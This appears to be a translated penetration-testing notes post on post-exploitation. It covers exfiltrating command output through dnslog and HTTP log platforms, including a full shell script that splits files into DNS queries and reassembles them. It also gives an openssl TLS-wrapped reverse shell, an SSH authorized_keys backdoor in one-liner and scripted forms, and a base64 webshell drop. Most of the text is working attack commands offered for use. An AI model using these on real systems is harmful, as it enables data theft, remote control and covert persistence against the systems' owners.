Getting the full request through dnslog

Most dnslog platforms cannot capture the whole payload when data is exfiltrated through them: a single DNS label is limited to 63 bytes and a complete name to 255, so anything longer is cut off or never resolves at all. A platform that also logs plain HTTP requests receives the full request body.

https://log.xn--9tr.com/


Switching to the following address gets the complete request, but Chinese characters come back garbled; base64- or hex-encode the data before sending if it contains non-ASCII text.

https://www.log.d48e48337471993e.com/


Alternatively, use the dnslog built into Burp (Collaborator), but that traffic raises alerts very easily, since the Collaborator domains are widely recognized by IDS signatures.


Write the output to a file and send the file

ls -l > aaa.txt; curl -d @aaa.txt http://<dnslog address>

Note that `curl -d @file` strips carriage returns and newlines from the file before sending it; use `--data-binary @aaa.txt` to keep the output intact, and base64-encode it first if the log panel garbles non-ASCII characters.
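The following is an added example, not a command from the original post, showing how to work within the DNS limits described at the top of the page instead of hoping a dnslog panel records a long name: the file is hex-encoded, split into labels of at most 60 characters, and each chunk is sent as its own query carrying an index so the receiver can reorder them. Hex rather than base64 is used because `+`, `/` and `=` are not valid hostname characters, and multi-byte (Chinese) text survives because only bytes are encoded. `example.com` stands in for your own dnslog domain, and `nslookup` is assumed to exist on the target; both are assumptions.

```sh
#!/bin/sh
# Added example: DNS exfiltration of a file in label-sized chunks, plus the
# receiver-side reassembly. Pure POSIX sh; no xxd or perl needed.
# DNS limits that drive the design: label <= 63 bytes, whole name <= 255.
# The dnslog domain passed as $2 is a placeholder, not a real endpoint.

# exfil_labels FILE DOMAIN
# Prints one query name per 30-byte chunk of FILE: <index>.<60 hex chars>.DOMAIN
# The index lets the receiver put out-of-order queries back together.
exfil_labels() {
    _file="$1"; _domain="$2"
    # hex-encode the whole file as one continuous string
    _hex=$(od -An -v -tx1 "$_file" | tr -d ' \n')
    _i=0
    while [ -n "$_hex" ]; do
        _chunk=$(printf '%s' "$_hex" | cut -c1-60)
        _hex=$(printf '%s' "$_hex" | cut -c61-)
        printf '%d.%s.%s\n' "$_i" "$_chunk" "$_domain"
        _i=$((_i + 1))
    done
}

# exfil_send FILE DOMAIN
# Resolves each name so the query shows up in the dnslog panel.
# Assumes nslookup is present on the target; not exercised by the test.
exfil_send() {
    exfil_labels "$1" "$2" | while read -r _name; do
        nslookup "$_name" >/dev/null 2>&1
    done
}

# hex_decode HEXSTRING -> raw bytes, using printf's octal escapes
hex_decode() {
    _h="$1"
    while [ -n "$_h" ]; do
        _b=$(printf '%s' "$_h" | cut -c1-2)
        _h=$(printf '%s' "$_h" | cut -c3-)
        printf "\\$(printf '%03o' "0x$_b")"
    done
}

# reassemble_labels < logged-names
# Receiver side: reads the query names the panel logged (any order), sorts
# them numerically by index, keeps only the hex label, and decodes the bytes.
reassemble_labels() {
    _all=$(sort -t. -k1,1n | cut -d. -f2 | tr -d '\n')
    hex_decode "$_all"
}
```

On the target, `exfil_send aaa.txt <your dnslog domain>` replaces the single long lookup; on the receiving side, paste the logged names into `reassemble_labels` to recover the original `ls -l` output byte for byte. Each name stays well under 255 bytes as long as the dnslog domain itself is short.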


Practical use

Check whether the host has outbound access


When outbound access exists

If outbound HTTP requests get through, try a reverse shell

https://weibell.github.io/reverse-shell-generator/#


If a traffic-inspection device blocks the plain-text reverse shell, try one wrapped in TLS with openssl

Run on the VPS

openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes   # just press Enter through every prompt
openssl s_server -quiet -key key.pem -cert cert.pem -port 8888

Port 8888 must be reachable from the target and must match the port used in the target-side command.

Run on the target

mkfifo /tmp/s; /bin/bash -i < /tmp/s 2>&1 | openssl s_client -quiet -connect ip:port > /tmp/s; rm /tmp/s

Replace ip:port with the VPS address and the s_server port. The named pipe carries the server's input back into bash, and the rm only runs once the connection closes, so the fifo is cleaned up when the shell ends.


When there is no outbound access

Connecting with a key pair

First check whether the current user can log in over SSH at all: the account needs a real login shell in /etc/passwd (not nologin or false), and sshd must allow public-key authentication for it (PubkeyAuthentication, AllowUsers/DenyUsers in sshd_config).


Generate a key pair, then write the public key


Key location: ~/.ssh/authorized_keys

ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAr9spiBHr5qJwgi+Bj8JJC3mqsFSYmJmovs+TXir2wgBbEvteMSDuDTYF02Mw6Xc2ACmrgzcVqxSXsGA4rdNz35g5wd8i83uZPbBsocfnwtO2fgKjZXPOIZ7qPc5UhYkfFK19qi+nYYaAH+S3cwS+NFON2aqXO6M/bdKOLV1pcNpjNw3tOaTikFOjFTidB03ryhW5R81PbFVVfvqFw2UM4whcQ2vK3lCCTjJZHnvUDbv0x+9AEaUxHZ57jYn1VmbyLDDlrl2mR4RHF7IjSbzfRjAD5LEDMOWF39XCX/OeMSQjqTEnkn7iPIYjKhv2wq/WYO+MyhzbOJ3I41B0tLmj0w==

echo 'c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBQkl3QUFBUUVBcjlzcGlCSHI1cUp3Z2krQmo4SkpDM21xc0ZTWW1KbW92cytUWGlyMndnQmJFdnRlTVNEdURUWUYwMk13NlhjMkFDbXJnemNWcXhTWHNHQTRyZE56MzVnNXdkOGk4M3VaUGJCc29jZmdZTytNeWh6Yk9KM0k0MUIwdExtajB3PT0=' | base64 -d > ~/.ssh/authorized_keys

Two caveats: `>` overwrites the file, so any keys the account's legitimate owner had are lost and the change is obvious; `>>` appends instead. The ~/.ssh directory must exist with mode 700 and authorized_keys with mode 600, or sshd ignores the file under StrictModes. Also, the base64 string shown here does not decode to the complete public key above; encode your own key (for example with `base64 -w0`) rather than reusing it.
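As an added example, not the original post's commands, the two steps above (checking that the user can log in, then writing the key) done in a way that does not clobber existing keys, sets the permissions sshd requires, and is idempotent on repeat runs. The home directory and passwd file are passed as arguments so the functions can be exercised against scratch files; the key strings and passwd lines in the test are constructed placeholders.

```sh
#!/bin/sh
# Added example: SSH key installation for persistence without outbound access.
# Not the original post's one-liner; home dir and passwd path are parameters
# so the logic can be tried against a scratch directory first.

# shell_allows_login PASSWD_FILE USER
# Returns 0 if USER's login shell in PASSWD_FILE is a real shell, 1 if the
# account has no entry or uses nologin/false (sshd would reject the login).
shell_allows_login() {
    _shell=$(awk -F: -v u="$2" '$1 == u { print $7 }' "$1")
    case "$_shell" in
        ''|*/nologin|*/false) return 1 ;;
        *) return 0 ;;
    esac
}

# install_authorized_key HOME_DIR "ssh-rsa AAAA... comment"
# Appends the key (never overwrites), fixes the modes StrictModes checks
# (700 on ~/.ssh, 600 on authorized_keys), skips keys already present, and
# prints how many keys the file holds afterwards. Returns 1 on filesystem errors.
install_authorized_key() {
    _home="$1"; _key="$2"
    _dir="$_home/.ssh"; _auth="$_dir/authorized_keys"
    mkdir -p "$_dir" && chmod 700 "$_dir" || return 1
    touch "$_auth" && chmod 600 "$_auth" || return 1
    # idempotent: a second run must not add a duplicate line
    if ! grep -qF -- "$_key" "$_auth"; then
        printf '%s\n' "$_key" >> "$_auth"
    fi
    grep -c '^ssh-' "$_auth"
}
```

Typical use on the target: `shell_allows_login /etc/passwd "$(id -un)" && install_authorized_key "$HOME" "$(cat mykey.pub)"`. The login-shell check is only half of the story; AllowUsers, DenyUsers and PubkeyAuthentication in sshd_config can still refuse the key, so read that file too when it is accessible.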

Writing a webshell

Write it to the web root or another path reachable from the front end

echo '<base64-encoded webshell>' | base64 -d > test.php

Base64 keeps the PHP tags and quotes out of the command line; the encoded payload itself is elided here.